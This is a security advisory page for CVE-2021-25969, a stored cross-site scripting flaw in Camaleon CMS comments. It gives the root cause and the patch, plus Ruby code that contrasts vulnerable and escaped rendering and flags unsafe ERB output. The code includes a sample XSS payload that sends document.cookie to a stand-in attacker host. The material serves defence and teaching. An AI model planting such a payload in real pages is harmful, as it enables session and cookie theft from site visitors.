
CVE-2021-25969: Camaleon CMS Stored Cross-site Scripting vulnerability

CVSS Score
6.1 (CVSS v3.1)

Basic Information

EPSS Score
0.82163%
Published
5/24/2022
Updated
1/26/2023
KEV Status
No
Technology
Ruby

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package Name
camaleon_cms
Ecosystem
rubygems
Vulnerable Versions
>= 0.0.1, < 2.6.0.1
First Patched Version
2.6.0.1

Vulnerability Intelligence

Miggo AI Root Cause Analysis

The vulnerability stems from rendering user-controlled comment content without escaping or sanitizing it. The patch diff shows:

  1. Removal of the 'raw' helper from ERB templates. 'raw' marks a string as html_safe, which bypasses the automatic HTML escaping Rails applies to <%= %> output.
  2. Addition of the 'sanitize' helper in comment_helper.rb, so comment bodies pass through Rails' HTML sanitizer before they are rendered.
  3. Multiple template files previously used <%= raw comment.content %>, which injects the stored comment body into the page as literal HTML. A comment containing a <script> tag or an event-handler attribute therefore executes in the browser of every user who views the post. This is the classic stored XSS pattern: untrusted input persisted and later rendered without escaping or sanitization.
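As an added illustration (not Camaleon CMS code and not part of the Miggo analysis), the Ruby below models the pre-patch and post-patch rendering of a comment body and adds a small audit that flags the unsafe-output pattern in ERB templates. Assumptions: ERB::Util.html_escape (stdlib) stands in for the output escaping Rails applies once `raw` is gone; the payload and the before/after template fragments are constructed for the example; the audit regexes are a heuristic, not a Camaleon or Rails tool. The block deliberately does not reimplement Rails' `sanitize` helper, which the real patch introduced.

```ruby
require "erb"

# Constructed sample comment body (not from the advisory): the kind of value an
# unprivileged user could submit through the post comment form.
PAYLOAD = %q{Nice post!<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>}

# Pre-patch behaviour. Rails' `raw` returns the string unchanged and marks it
# html_safe, so `<%= raw comment.content %>` skips output escaping. Plain ERB's
# `<%= %>` never escapes, so interpolating the value as-is models that exactly.
VULNERABLE_TEMPLATE = ERB.new(%q{<div class="comment"><%= content %></div>})

# Post-patch behaviour. With `raw` removed, Rails HTML-escapes `<%= %>` output;
# ERB::Util.html_escape stands in for that default here (assumption).
FIXED_TEMPLATE = ERB.new(%q{<div class="comment"><%= ERB::Util.html_escape(content) %></div>})

def render_comment_vulnerable(content)
  VULNERABLE_TEMPLATE.result_with_hash(content: content)
end

def render_comment_fixed(content)
  FIXED_TEMPLATE.result_with_hash(content: content)
end

# Audit heuristic (assumption, not a Camaleon or Rails tool): flag ERB lines that
# emit a value as trusted HTML. `<%= raw ... %>`, Erubi's `<%== ... %>` and
# `.html_safe` all bypass escaping.
UNSAFE_OUTPUT_PATTERNS = [
  /<%=\s*raw\b/,
  /<%==/,
  /\.html_safe\b/
].freeze

# Returns one finding per (line, pattern) hit, with the 1-based line number.
def find_unsafe_output(template_source)
  findings = []
  template_source.each_line.with_index(1) do |line, lineno|
    UNSAFE_OUTPUT_PATTERNS.each do |re|
      findings << { line: lineno, pattern: re.source, text: line.strip } if re.match?(line)
    end
  end
  findings
end

# Constructed before/after template fragments mirroring the pattern described
# in the root-cause analysis (illustrative, not the real Camaleon views).
BEFORE_TEMPLATE = <<~TEMPLATE
  <div class="comment-body">
    <%= raw comment.content %>
  </div>
TEMPLATE

AFTER_TEMPLATE = <<~TEMPLATE
  <div class="comment-body">
    <%= sanitize comment.content %>
  </div>
TEMPLATE

if $PROGRAM_NAME == __FILE__
  puts "vulnerable: #{render_comment_vulnerable(PAYLOAD)}"
  puts "fixed:      #{render_comment_fixed(PAYLOAD)}"
  find_unsafe_output(BEFORE_TEMPLATE).each { |f| puts "before.erb:#{f[:line]} #{f[:text]}" }
  puts "after.erb: #{find_unsafe_output(AFTER_TEMPLATE).empty? ? 'clean' : 'unsafe'}"
end
```

Escaping and sanitizing are different fixes: html_escape turns every tag into visible text, while Rails' `sanitize` (the helper the patch added) keeps an allowlisted subset of markup so comments can still carry basic formatting. The regex audit only catches the explicit bypass helpers; it will not see markup built with string concatenation or `content_tag` misuse, so treat a clean result as a first pass rather than proof.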

WAF Protection Rules

WAF Rule

In “Camaleon CMS” application, versions 0.0.1 through 2.6.0 are vulnerable to stored XSS, which allows unprivileged application users to store malicious scripts in the comments section of a post. These scripts are executed in a victim’s browser when
